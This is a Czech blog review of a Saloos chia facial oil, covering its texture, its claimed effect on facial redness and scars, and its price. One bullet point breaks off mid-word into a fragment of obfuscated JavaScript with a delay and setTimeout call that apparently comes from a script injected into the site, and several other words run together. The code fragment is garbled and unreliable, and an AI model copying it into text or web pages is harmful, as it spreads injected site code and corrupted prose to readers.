CHIA olej: proti ruměncům ve tvářích

Google+ Pinterest LinkedIn Tumblr +

Chia semínka – znáte je? Já osobně si je sypu do jogurtů, kaší, pudinků nebo zeleninových salátů. Někde jsem se dočetla, že obsahují spoustu omega-3 a omega-6 mastných kyselin, které chrání cévy. A že dodávají energii sportovcům. Ne že bych byla sportovec, ale nějaký ten efekt jsem po čase vážně zaznamenala. Ale chia v kosmetice???

Proč ne! 🙂 Kdo mě zná, ví, že miluju pleťové oleje, a to už pěknou řádku měsíců. Vyhovuje mi, jak jsou hutné, výživné, a přestože se jedná o oleje, paradoxně vůbec nemastí (pokud si je člověk aplikuje tak, jak se má, tedy na NAVLHČENOU PLEŤ a skutečně pouze PÁR KAPEK).

A kdo mě zná ještě lépe, ví také, že miluju aromaterapeutickou kosmetiku SALOOS. Ve své sbírce mám celou řadu sprchových olejů, tělových a pleťových olejů a vod. No a tak jsem zkusila i tuhle novinku. Chia olejíček má, podobně jako všechny jejich produkty, sofistikovaný vzhled: skleněnou lahvičku tak akorát do kabelky, praktickou pipetku a decentní design.

  • Olej je hutný a neparfemovaný, což je super, protože si neumím představit vdechovat odér chia semínek :)).
  • Báječně se roztírá na navlhčené pleti (vlhčím ji růžovou vodou, levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andulovou vodou nebo ji pomažu tekutým stříbremto je můj velký hit, o kterém chystám článek).
  • Rychle se vstřebává a nezanechává mastný film (na obličej stačí dvě kapky, další dvě na krk, tři na dekolt).

Co slibuje…

… To zatím plní! Používám ho čtvrtý týden, což je dostatečně dlouhá doba na to, abych si všimla nějakých prvních výsledků. Tak tedy:

  • olej je určen všem typům pokožky, zejména pak pokožce přesušené se sklonem k červenání. BINGO, opět jeden z mála olejů, dělaný mé pleti na míru :). Drobné červené flíčky, které mi na pleti vyskáčou při sebemenším rozčilení, rozrušení, ale i z tepla, nebo naopak chladu, hooodně vymyzely. Naskakují, ale ta červeň je slabší a je jich znatelně méně, hlavně kolem nosu. Chia olej totiž podporuje prokrveníto znamená, že pokožka se prokrvuje rovnoměrně, což je přesně to, co holky s ruměncem potřebují :).
  • Olej by si měl poradit i s narušenou problematickou pletí. Tu já nemám, ale věřím tomu, jelikož olej nemastí, tudíž neucpává póry, a báječně pleť zjemňuje.
  • Olej je díky vysoce regeneračním schopnostem vhodný i jako péče o jizvy. Na svého „smajlíka“ po císařském řezu zatím stále používám šípkový olej (také od Saloos) a mixuju ho s arganovým olejem (od Renovality), protože jsou oba perfektní a nemám důvod je měnit, ale zkuste to, určitě neprohloupíte.

Stejně jako všechny oleje od Saloos je i tento lisován za studena a má čistě přírodní původ. Je v něm tudíž zachován maximální počet vitaminů a dalších prospěšných látek. 20 ml za cca 120 Kč? Mám chuť jim napsat, že se okrádají… Vážně jo!

 

Sdílet.

O autorovi

Zanechte odpověď